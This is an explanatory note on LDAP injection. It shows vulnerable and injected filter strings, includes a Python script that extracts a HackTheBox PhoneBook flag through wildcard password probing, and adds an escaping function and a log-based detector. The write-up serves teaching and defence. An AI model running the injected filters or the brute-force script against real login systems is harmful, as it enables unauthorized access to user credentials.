LDAP Injection

Introduction

  • LDAP (Lightweight Directory Access Protocol) injection is a type of security exploit that is used to compromise the authentication process used by some websites. Websites that construct LDAP statements from user data are vulnerable to this type of attack.

  • LDAP directories store objects, which include information about these users and the organization's assets. For example, an LDAP directory may contain lists of the different usernames, passwords and email addresses of the users in the organization. If an LDAP directory is used for website authentication, an attacker can enter malicious code into a user input field, gain unauthorized access to the directory, and view or change usernames and passwords.

How LDAP injection works

Example of an LDAP query that takes two input values, username and pass:

find("(&(cn=" + username +")(userPassword=" + pass +"))")

Because the filter is built by string concatenation and the input characters are not filtered, the query can end up looking like this:

find("(&(cn=*)(cn=*))(|(cn=*)(userPassword=" + pass +"))")
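The two filters above side by side, as an added example that is not part of the original note: the concatenated (vulnerable) form next to one that escapes every user-controlled value according to RFC 4515 before it is placed in the filter. The escaper is written here by hand and no directory is contacted; the functions only return the filter strings that would be sent, and assertion_count shows whether the input was able to change the structure of the filter.

```python
# Added example, not from the original note. Assumptions: a hand-written
# RFC 4515 escaper (no LDAP library imported) and no live directory.


def escape_filter_value(value: str) -> str:
    """Escape the characters RFC 4515 gives special meaning inside an
    assertion value, so user input cannot open or close filter components."""
    escapes = {
        "\\": "\\5c",
        "*": "\\2a",
        "(": "\\28",
        ")": "\\29",
        "\x00": "\\00",
    }
    return "".join(escapes.get(ch, ch) for ch in value)


def vulnerable_filter(username: str, password: str) -> str:
    # Same shape as the note's find(...) call: raw string concatenation.
    return "(&(cn=" + username + ")(userPassword=" + password + "))"


def safe_filter(username: str, password: str) -> str:
    # Every user-controlled value passes through the escaper first.
    return "(&(cn=%s)(userPassword=%s))" % (
        escape_filter_value(username),
        escape_filter_value(password),
    )


def assertion_count(filter_str: str) -> int:
    """Number of unescaped '(' in a filter. The template above always
    produces three; any other value means the input changed the structure."""
    count = 0
    i = 0
    while i < len(filter_str):
        if filter_str[i] == "\\":
            i += 3  # skip a \XX escape sequence
            continue
        if filter_str[i] == "(":
            count += 1
        i += 1
    return count


if __name__ == "__main__":
    # Constructed inputs in the shape of the note's examples.
    for user, pw in [("Reese", "HTB{d1*"), ("*)(cn=*", "x")]:
        bad = vulnerable_filter(user, pw)
        good = safe_filter(user, pw)
        print("unsafe:", bad, "->", assertion_count(bad), "components")
        print("safe:  ", good, "->", assertion_count(good), "components")
```

In production code use the escaper your LDAP library ships (python-ldap's ldap.filter.escape_filter_chars, ldap3's escape_filter_chars) rather than a custom one, and prefer authenticating by binding as the user's DN: then the password never appears in a search filter at all, which also removes the wildcard channel the note's PhoneBook script relies on.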

What types of LDAP injection attacks are there?

  1. Authentication bypass
  2. Elevation of access privileges
  3. Resource disclosure
  4. Blind attack

The difference between SQLi and LDAP injection

  • All of these injection attacks take advantage of scenarios where an application fails to properly sanitize user input.
  • The difference between LDAP and SQL injection is the protocol or language that they exploit, and therefore the syntax of the attack data. LDAP is a protocol for accessing information in directories, whereas SQL is a query language for databases. Therefore, the attacks target different information stores.

For example:


The PhoneBook challenge on HackTheBox is a typical example of what this note describes.

import requests
import string

url = "http://161.35.162.182:32216/login"
# renamed from 'string' so the module is not shadowed
charset = string.ascii_letters + string.digits + "_}{"
password = "HTB{d1rectory_"

for i in range(1, 30):
    for j in charset:
        print(j, end='\r')
        # trailing wildcard: the filter matches when the prefix so far is correct
        a = password + j + "*"
        data = {"username": "Reese", "password": a}
        r = requests.post(url=url, data=data)
        # a successful match redirects away from the login-failure page
        if "Authentication" not in r.url:
            password += j
            print(password)
            break
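The directory side of the script above leaves a recognisable trace: a run of search filters against one cn whose userPassword value ends in a wildcard and grows by one character each time. The following is an added detection example, not part of the original note or the HackTheBox challenge. It scans lines written in the shape of OpenLDAP's "stats" search logging (the sample lines are constructed, not real captures), flags filters with a wildcard in a password assertion or with more than one top-level component (the note's injected query), and counts probes per account.

```python
# Added example, not from the original note. Assumptions: log lines
# approximating slapd stats output; the sample below is constructed.
import re
from collections import Counter

SAMPLE_LOG = """\
conn=1001 op=1 SRCH base="dc=example,dc=com" scope=2 filter="(&(cn=alice)(userPassword=s3cret))"
conn=1002 op=1 SRCH base="dc=example,dc=com" scope=2 filter="(&(cn=Reese)(userPassword=HTB{d*))"
conn=1003 op=1 SRCH base="dc=example,dc=com" scope=2 filter="(&(cn=Reese)(userPassword=HTB{d1*))"
conn=1004 op=1 SRCH base="dc=example,dc=com" scope=2 filter="(&(cn=Reese)(userPassword=HTB{d1r*))"
conn=1005 op=1 SRCH base="dc=example,dc=com" scope=2 filter="(&(cn=*)(cn=*))(|(cn=*)(userPassword=x))"
conn=1006 op=1 SRCH base="dc=example,dc=com" scope=2 filter="(&(cn=bob)(userPassword=hunter2))"
"""

FILTER_RE = re.compile(r'filter="([^"]*)"')
CONN_RE = re.compile(r'conn=(\d+)')
# one (attribute=value) assertion; values never contain parentheses
ASSERTION_RE = re.compile(r'\(([A-Za-z][\w;.-]*)=([^()]*)\)')

WILDCARD_REASON = "wildcard in userPassword value"
STRUCTURE_REASON = "more than one top-level filter"


def top_level_count(flt: str) -> int:
    """Count filter components at nesting depth 0. A well-formed filter
    has exactly one; the note's injected example has two."""
    depth = 0
    count = 0
    for ch in flt:
        if ch == "(":
            if depth == 0:
                count += 1
            depth += 1
        elif ch == ")":
            depth -= 1
    return count


def suspicious_filters(log_text: str):
    """Return one record per search whose filter looks like probing
    or structural injection."""
    hits = []
    for line in log_text.splitlines():
        m = FILTER_RE.search(line)
        if not m:
            continue
        flt = m.group(1)
        cm = CONN_RE.search(line)
        conn = cm.group(1) if cm else "?"
        reasons = []
        for attr, value in ASSERTION_RE.findall(flt):
            if attr.lower() == "userpassword" and "*" in value:
                reasons.append(WILDCARD_REASON)
                break
        if top_level_count(flt) != 1:
            reasons.append(STRUCTURE_REASON)
        if reasons:
            hits.append({"conn": conn, "filter": flt, "reasons": reasons})
    return hits


def probe_counts(log_text: str) -> Counter:
    """Wildcard password probes per cn. A rising count against a single
    account is the signature of character-by-character extraction."""
    counts = Counter()
    for hit in suspicious_filters(log_text):
        if WILDCARD_REASON not in hit["reasons"]:
            continue
        for attr, value in ASSERTION_RE.findall(hit["filter"]):
            if attr.lower() == "cn":
                counts[value] += 1
                break
    return counts


if __name__ == "__main__":
    for hit in suspicious_filters(SAMPLE_LOG):
        print(hit["conn"], ", ".join(hit["reasons"]), hit["filter"])
    print(dict(probe_counts(SAMPLE_LOG)))
```

Alerting on the per-account count (rather than on any single wildcard) keeps legitimate substring searches on non-password attributes quiet while still catching the slow, one-character-per-request pattern; the structural check catches the authentication-bypass form even when no wildcard touches the password.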